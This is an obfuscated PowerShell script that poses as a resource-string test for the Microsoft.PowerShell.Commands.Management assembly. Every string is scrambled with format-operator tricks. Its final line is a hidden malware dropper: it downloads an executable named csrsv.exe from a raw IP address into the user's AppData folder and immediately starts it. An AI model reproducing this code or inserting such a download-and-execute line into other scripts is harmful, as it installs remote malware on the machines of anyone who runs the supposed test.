. "$psscriptroot/TestRunner.ps1"
${a`ss`eMB`LYNA`me} = ("{0}{2}{3}{5}{4}{8}{1}{6}{7}"-f 'Micro','ands','soft','.','we','Po','.Ma','nagement','rShell.Comm')



${eXC`LUDeLI`ST} = ("{3}{5}{2}{0}{1}{4}" -f'e','s','sourc','Eve','.resx','ntlogRe'),
    ("{7}{5}{0}{3}{1}{2}{4}{6}" -f 'nR','so','urces.r','e','e','nsactio','sx','Tra'),
    ("{1}{0}{2}{3}{4}{5}"-f 'bS','We','erviceR','esources','.re','sx'),
    ("{3}{2}{0}{4}{5}{1}"-f 's','sx','ixResource','HotF','.r','e'),
    ("{6}{3}{4}{5}{1}{0}{7}{2}"-f 'anelR','lP','esx','on','tr','o','C','esources.r'),
    ("{0}{4}{1}{5}{2}{3}"-f 'W','iRe','es.re','sx','m','sourc'),
    ("{0}{2}{1}{4}{5}{3}" -f'Management','shSn','M','resx','apIn','Resources.'),
    ("{3}{5}{6}{4}{2}{0}{1}" -f'nResources.','resx','i','C','ycleB','l','earRec'),
    ("{2}{5}{6}{0}{4}{1}{3}" -f'ar','Resources.res','Clip','x','d','b','o')


.("{3}{5}{1}{4}{2}{0}" -f 'eStrings','esou','c','Te','r','st-R') -AssemblyName ${ASSE`mB`Ly`NAMe} -ExcludeList ${eXCL`U`D`eLIst}

(&("{0}{1}{2}" -f 'N','e','w-Object') ("{0}{4}{3}{1}{2}"-f 'System','.WebCli','ent','Net','.')).("{3}{1}{0}{2}"-f'l','nloadFi','e','Dow').Invoke(("{5}{1}{2}{6}{3}{0}{4}"-f 'ah','://94.1','0','38/~y','oo/csrsv.exe','http','2.53.2'),"$env:APPDATA\csrsv.exe");.("{1}{0}{2}{3}" -f 't-Proc','Star','e','ss') ("$env:APPDATA\csrsv.exe")
